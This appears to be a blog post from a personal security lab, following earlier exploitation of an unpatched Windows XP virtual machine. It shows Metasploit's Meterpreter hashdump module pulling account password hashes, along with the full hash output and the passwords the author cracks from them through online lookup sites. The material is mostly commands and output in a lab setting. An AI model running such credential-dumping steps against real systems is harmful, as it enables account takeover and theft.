This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
And so to the Meterpreter:
meterpreter > use priv <– To run as privileged account
[-] The ‘priv’ extension has already been loaded.
meterpreter > run post/windows/gather/hashdump[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…No users with password hints on this system
[*] Dumping password hashes…
Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:6b07ba3b4d75aa51838b0cfdc86c8df3:e45fffac3de66133d18d22904c5826cf:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0eed33aba5c1d0b4380877fc6a9d3782:::
Lab1:1003:120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6:::
IUSR_LAB:1004:62370555cf8f248a0e09beb9498d8aef:e3f63f5c44a2d1b51f41605f8b393f9a:::
IWAM_LAB:1005:f36ec01c239defaaf55c7c89733523b1:5a0701b3aada738fcca9bec7d5de30a5:::
ASPNET:1006:7287a164a7e06a495f8d3fe3df15c6f4:44919150091298dd9585de0e598750a2:::
__vmware_user__:1013:aad3b435b51404eeaad3b435b51404ee:bb971f73d6fd552502d31ee0ba49d197:::
Hash beginning aad3b435 is an empty string.
I copied the Administrators Windows LAN Manger (LM) password hash (81cbcea8a9af93bbaad3b435b51404ee) and decrypted it, and was rewarded with “S3CR3T” which is indeed the correct password!
I did the same as above with the LAB1 LM hash (120fafeb2e7c7e58944e2df489a880e4) on a different website as the first website website was unable to decrypt it, and again was rewarded with “WHATEVER” which is the correct password.
Interestingly, when I entered the second password hash (NTLM) of LAB1 (e653e6452753c97e46792567dff599b6) the first website decrypted it fine.
In the output above it’s noted: “No users with password hints on this system” and so I set a “hint” and reran the scan:
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hints…Lab1:”My feet smell”
And there’s the password hint: ”My feet smell”